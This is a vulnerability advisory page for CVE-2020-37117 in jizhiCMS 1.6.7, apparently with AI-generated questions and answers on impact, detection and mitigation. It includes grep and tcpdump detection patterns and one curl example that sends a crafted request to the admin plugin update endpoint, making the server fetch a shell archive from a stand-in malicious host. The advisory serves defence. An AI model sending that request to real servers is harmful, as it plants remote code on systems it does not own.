CVE-2020-37117
Arbitrary File Download in jizhiCMS 1.6.7 Admin Plugin
Publication date: 2026-02-05
Last updated on: 2026-02-24
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| jizhicms | jizhicms | 1.6.7 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-434 | The product allows the upload or transfer of dangerous file types that are automatically processed within its environment. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
[{'type': 'paragraph', 'content': "CVE-2020-37117 is an arbitrary file download vulnerability in jizhiCMS version 1.6.7. It exists in the admin plugins update endpoint, where authenticated administrators can be tricked into sending crafted POST requests containing malicious 'filepath' and 'download_url' parameters. This allows attackers to download arbitrary files from the server."}, {'type': 'paragraph', 'content': 'The exploit involves sending specially crafted POST requests to the endpoint /admin.php/Plugins/update.html, which can trigger unauthorized file downloads and even unzip malicious files on the server, potentially leading to remote code execution.'}] [1, 3]
How can this vulnerability impact me? :
This vulnerability can have serious impacts including unauthorized access to sensitive files on the server, which compromises confidentiality.
Additionally, by downloading and unzipping malicious files, attackers may execute arbitrary code on the server, affecting integrity and availability of the system.
Because the vulnerability requires authenticated administrator privileges, it can be exploited by insiders or attackers who have gained admin access.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by monitoring for suspicious POST requests sent to the endpoint /admin.php/Plugins/update.html that include parameters such as action=start-download or action=file-upzip along with filepath and download_url parameters.'}, {'type': 'paragraph', 'content': 'You can use network monitoring tools or web server logs to look for these crafted POST requests indicating attempts to exploit the arbitrary file download vulnerability.'}, {'type': 'paragraph', 'content': 'Example commands to detect such activity might include using curl to simulate or detect these requests or using grep to search web server logs for suspicious POST requests.'}, {'type': 'list_item', 'content': "grep 'POST /admin.php/Plugins/update.html' /var/log/apache2/access.log | grep -E 'action=start-download|action=file-upzip'"}, {'type': 'list_item', 'content': "tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep -E 'action=start-download|action=file-upzip'"}, {'type': 'list_item', 'content': "curl -X POST 'http://target/admin.php/Plugins/update.html' -d 'action=start-download&filepath=shell&download_url=http://malicious.server/shell.zip' (for testing detection)"}] [1, 3]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the vulnerable admin plugins update endpoint to trusted administrators only and ensuring strong authentication is enforced.
You should also monitor and block suspicious POST requests that attempt to exploit the file download functionality by filtering or blocking requests with parameters like action=start-download or action=file-upzip.
Updating jizhiCMS to a version that patches this vulnerability, if available, is strongly recommended.
If patching is not immediately possible, consider disabling or restricting the plugin update functionality temporarily to prevent exploitation.